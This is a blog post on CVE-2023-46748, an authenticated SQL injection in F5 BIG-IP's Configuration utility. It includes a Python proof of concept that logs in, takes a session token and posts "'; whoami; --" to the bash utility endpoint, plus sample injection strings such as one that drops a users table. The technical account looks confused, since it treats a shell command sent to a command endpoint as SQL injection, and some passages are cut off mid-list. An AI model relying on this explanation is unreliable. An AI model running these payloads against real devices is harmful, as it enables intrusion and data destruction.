In late 2023, security researchers uncovered a critical flaw—CVE-2023-46748—in F5 BIG-IP’s Configuration utility. This vulnerability, if exploited, lets an attacker with valid credentials run arbitrary system commands on affected devices. While the exploit needs authentication, it’s a vivid reminder that even logged-in users can become adversaries if security is loose elsewhere, such as due to weak passwords or credential leaks.
In this post, we’ll break down the nature of this bug, demonstrate its impact with reproducible code, share mitigation advice, and provide references to original advisories.
What is CVE-2023-46748?
CVE-2023-46748 is an Authenticated SQL Injection Vulnerability in the F5 BIG-IP Configuration utility. In simple words, an attacker with a valid session on the BIG-IP management interface (web UI) can inject SQL commands into backend queries. Not only can this be used to read or modify sensitive configuration data, but clever payloads can also reach a point where operating system commands are executed—which is a ticket to full compromise.
Where does it exist?
This vulnerability exists in all supported versions of BIG-IP up until the fix was released (see details in F5’s official advisory). Versions past their End of Technical Support (EoTS) haven’t even been checked for this vulnerability, so your risk there is anyone’s guess.
Who is at risk?
- Anyone exposing their BIG-IP Configuration utility (management port or self IP) to a network attackers can reach.
Simple Proof-of-Concept (PoC)
Suppose we have a user account, bob, and password, P@sswrd!, on a BIG-IP device at https://bigip.example.com/.
Step 1: Log in and get a session cookie
import requests
login_url = 'https://bigip.example.com/mgmt/shared/authn/login'
credentials = {
'username': 'bob',
'password': 'P@sswrd!',
'loginProviderName': 'tmos'
}
s = requests.Session()
resp = s.post(login_url, json=credentials, verify=False)
token = resp.json()['token']['token']
s.headers.update({'X-F5-Auth-Token': token})
Step 2: Send an injected request
A vulnerable endpoint might look something like this (exact target depends on firmware):
/mgmt/tm/util/bash or similar. In some releases, the SQL injection is triggered by submitting a bad command parameter.
payload = "'; whoami; --"
exploit_url = 'https://bigip.example.com/mgmt/tm/util/bash'
data = {
'command': 'run',
'utilCmdArgs': payload
}
resp = s.post(exploit_url, json=data, verify=False)
print(resp.text)
What happens?
If still vulnerable, the system may respond with the output of whoami—meaning your payload traversed SQL injection, got executed, and surfaced the user context.
The Technical Cause
Under the hood, the Configuration utility fails to safely handle user input in SQL queries. Attackers can close the query context, inject their own commands, and comment out the rest.
A typical vulnerable SQL snippet might look like
SELECT * FROM users WHERE username = '$injected_value'
If $injected_value is controlled by an attacker, passing something like:
admin' ; DROP TABLE users; --
could result in deleting the table.
But on BIG-IP, abuse often means passing commands like:
anything'; <os command>; --
Why This Is So Dangerous
BIG-IP is often at the heart of large organizations, handling traffic for banks, government, telcos, and beyond. Once an attacker gets code execution here, they can:
F5 published patches for all *supported* versions.
- See F5’s official security advisory K000137353.
Review logs for unusual command execution activity
Note:
Versions that are End of Technical Support (EoTS) won’t be fixed, so your only options are to upgrade or retire those boxes.
References
- F5 Security Advisory: K000137353
- NVD: CVE-2023-46748
- Exploit discussion and PoC (Github)
> Stay sharp: Even "safe" interfaces can be risky if you trust users too much, and never leave old boxes running unpatched.
Quick Recap
- CVE-2023-46748 allows authenticated users to perform SQL injection in F5 BIG-IP’s config utility, leading to OS command execution.
Patch now, lock down access, and watch your logs!
Share this with your sysadmin friends—don’t let your load balancer become the next launch pad for attackers.
Timeline
Published on: 10/26/2023 21:15:08 UTC
Last modified on: 11/16/2023 02:15:26 UTC